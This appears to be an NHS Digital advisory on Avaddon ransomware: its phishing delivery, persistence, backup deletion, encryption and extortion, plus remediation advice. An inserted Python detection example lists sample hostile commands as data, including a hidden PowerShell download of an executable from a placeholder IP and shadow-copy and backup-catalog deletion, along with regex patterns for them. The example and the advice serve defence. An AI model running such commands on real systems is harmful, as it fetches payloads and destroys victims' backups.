
Avaddon Ransomware

Avaddon was first observed in February 2020 and is a RaaS tool which is delivered through phishing campaigns. The group behind it uses Avaddon to both steal and encrypt files in double extortion attacks, posting the stolen information on a leak site.




Affected platforms

The following platforms are known to be affected:

Threat details

Introduction

First observed in February 2020, Avaddon is a ransomware-as-a-service (RaaS) tool targeting organisations globally. In June 2020, Avaddon added the option to launch payloads via PowerShell, and in January 2021 it added the ability to perform distributed denial-of-service (DDoS) attacks to its arsenal.


Delivery

Avaddon is typically delivered via phishing emails which employ obfuscation techniques. These emails have JPEG or zipped file attachments, which themselves contain a preliminary downloader in a .js payload. Once run, the downloader detects whether the user is located in any member nation of the Commonwealth of Independent States (CIS) by checking the operating system language and keyboard layout. If either of these returns Russian or Ukrainian, it will terminate itself. The downloader uses embedded versions of two Microsoft tools, PowerShell and BITS, to download an Avaddon payload from a command and control server and execute it.

Some Avaddon campaigns use exposed Remote Desktop Service connections to directly deliver Avaddon payloads to target systems.


Activities

Once delivered, Avaddon will generate new Windows services and scheduled tasks to ensure persistence, before terminating any processes that may seek to keep files in use. If successful, it will disable system recovery services and delete any backups. All reachable non-system files are then encrypted using an AES-256 implementation, with a particular focus on files and directories associated with Microsoft Exchange. Encrypted files are then appended with a user-specific string, ensuring each attack is unique.

The group operating Avaddon will also attempt to extract sensitive files during Avaddon's preparation phases. These files are then used to coerce affected organisations into paying their ransom demands. The group will also threaten organisations with targeted DDoS attacks as another means to coerce payment.
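The Delivery and Activities sections above describe a chain a defender can watch for in process-creation telemetry: a BITS download launched from PowerShell, new services and scheduled tasks, and recovery or backup services being disabled. The following added example (not NHS Digital's or the Avaddon operators' code) runs simple behaviour rules over constructed sample events and escalates a host only when several stages of that chain appear together; the event field layout, command lines and host names are assumptions for this example.

```python
import re
from collections import defaultdict

# Constructed sample process-creation events (host|user|image|command line).
# The layout and every value here are assumptions for this example, not real telemetry.
SAMPLE_EVENTS = [
    "ws01|alice|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell -w hidden Start-BitsTransfer -Source http://203.0.113.10/u.bin -Destination C:\\Users\\alice\\AppData\\Local\\Temp\\u.exe",
    "ws01|alice|C:\\Windows\\System32\\sc.exe|sc create UpdSvc binPath= C:\\Users\\alice\\AppData\\Local\\Temp\\u.exe start= auto",
    "ws01|alice|C:\\Windows\\System32\\schtasks.exe|schtasks /create /tn Upd /tr C:\\Users\\alice\\AppData\\Local\\Temp\\u.exe /sc onlogon",
    "ws01|alice|C:\\Windows\\System32\\vssadmin.exe|vssadmin delete shadows /all /quiet",
    "ws01|alice|C:\\Windows\\System32\\wbadmin.exe|wbadmin delete catalog -quiet",
    "ws02|bob|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell Get-ChildItem C:\\Logs",
    "ws02|svc_backup|C:\\Windows\\System32\\vssadmin.exe|vssadmin list shadows",
]

# Each rule maps one behaviour from the advisory to a case-insensitive pattern
# on the command line. Benign admin use (e.g. listing shadow copies) does not match.
RULES = [
    ("bits_download", re.compile(r"Start-BitsTransfer|bitsadmin(\.exe)?\s+/transfer", re.I)),
    ("service_persistence", re.compile(r"\bsc(\.exe)?\s+create\b", re.I)),
    ("scheduled_task_persistence", re.compile(r"schtasks(\.exe)?\s+/create\b", re.I)),
    ("shadow_copy_deletion", re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I)),
    ("backup_catalog_deletion", re.compile(r"wbadmin(\.exe)?\s+delete\s+catalog", re.I)),
    ("recovery_disabled", re.compile(r"bcdedit(\.exe)?\s+.*recoveryenabled\s+no", re.I)),
]

def parse_event(line):
    host, user, image, cmdline = line.split("|", 3)
    return {"host": host, "user": user, "image": image, "cmdline": cmdline}

def match_rules(event):
    # Names of every rule whose pattern appears in this event's command line.
    return [name for name, rx in RULES if rx.search(event["cmdline"])]

def stages_by_host(lines):
    # Distinct behaviour stages observed per host across all events.
    seen = defaultdict(set)
    for line in lines:
        ev = parse_event(line)
        for name in match_rules(ev):
            seen[ev["host"]].add(name)
    return dict(seen)

def hosts_to_escalate(lines, min_stages=2):
    # A single stage may be legitimate administration; several together on one
    # host match the advisory's chain and warrant isolating the device.
    return sorted(h for h, s in stages_by_host(lines).items() if len(s) >= min_stages)

if __name__ == "__main__":
    for host, stages in stages_by_host(SAMPLE_EVENTS).items():
        print(host, sorted(stages))
    print("escalate:", hosts_to_escalate(SAMPLE_EVENTS))
```

Feeding real Sysmon or EDR process-creation records requires only adapting `parse_event` to that source's field layout.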


Remediation advice

If a device on your network becomes infected with ransomware it will begin encrypting files, which may also include remote files on network locations. The only guaranteed way to recover from a ransomware infection is to restore all affected files from their most recent backup. To limit the impact of a ransomware infection, NHS Digital advises that:

  • Critical data is frequently saved in multiple backup locations.
  • At least one backup is kept offline at any time (separated from live systems).
  • Backups and incident recovery plans are tested to ensure that data can be restored when needed.
  • User account permissions for modifying data are regularly reviewed and restricted to the minimum necessary.
  • Infected systems are disconnected from the network and powered down as soon as practicable.
  • Any user account credentials that may have been compromised are reset on a clean device.
  • Where infected systems cannot be quarantined with confidence, the affected organisation disconnects from national networks to limit propagation.

Additionally, to prevent and detect an infection, NHS Digital advises that:

  • Secure configurations are applied to all devices.
  • Security updates are applied at the earliest opportunity.
  • Tamper protection settings in security products are enabled where available.
  • Obsolete platforms are segregated from the rest of the network.
  • IT usage policies are reinforced by regular training to ensure all users know not to open unsolicited links or attachments.
  • Multi-factor authentication (MFA) and lockout policies are used where practicable, especially for administrative accounts.
  • Administrative accounts are only used for necessary purposes.
  • Remote administration services use strongly encrypted protocols and only accept connections from authorised users or locations.
  • Systems are continuously monitored, and unusual activity is investigated, so that a compromise of the network can be detected as early as possible.

Please note that NCSC maintains guidance for securely configuring a wide range of end user device (EUD) platforms. For further details refer to their end user device security guidance pages.


Indicators of compromise

Host Indicators

SHA1 hashes


SHA256 hashes


Last edited: 29 April 2021 3:34 pm